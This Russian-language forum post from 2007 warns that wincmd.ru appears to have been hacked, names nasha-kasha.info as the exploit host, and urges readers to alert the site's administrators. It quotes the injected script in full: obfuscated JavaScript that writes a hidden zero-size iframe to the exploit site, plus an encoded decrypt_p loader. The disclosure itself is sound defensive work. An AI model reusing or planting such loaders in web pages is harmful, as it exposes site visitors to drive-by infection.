Автор: cracklover
Дата сообщения: 02.07.2007 11:41
ВНИМАНИЕ!!!
Будьте осторожны.
Судя по вссему, известный сайт wincmd.ru взломали!
На некоторых страничках подгружается через ява-скрипт банальный вирус!
Добавлено:
Точно! Скрипт лезет на nasha-kasha.info. Там сплоит!
Ещё раз призываю к бдительности. Кто сможет сделать это быстрее, чем я, свяжитесь с администрацией wincmd.ru и сообщите об этом!
Добавлено:
А вот пошифрованный участок скрипта:
[more]
<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C110%2C97%2C115%2C104%2C97%2C45%2C107%2C97%2C115%2C104%2C97%2C46%2C105%2C110%2C102%2C111%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>
<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,59,39,21,14,30,34,25,33,55,0,0,0,0,0,0,18,45,15,47,17,37,19,5,35,29,13,36,26,58,22,27,60,24,53,40,41,31,20,50,52,11,48,0,0,0,0,62,0,51,1,8,7,16,10,9,4,12,2,43,49,3,57,0,23,44,6,28,38,56,54,42,61,46,32);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("GtTloCsXoUxtvkPRpaJ8GWCWepc1RpcaNpulgkql4msZYtT6rmPWDmPROj")</script>
[/more]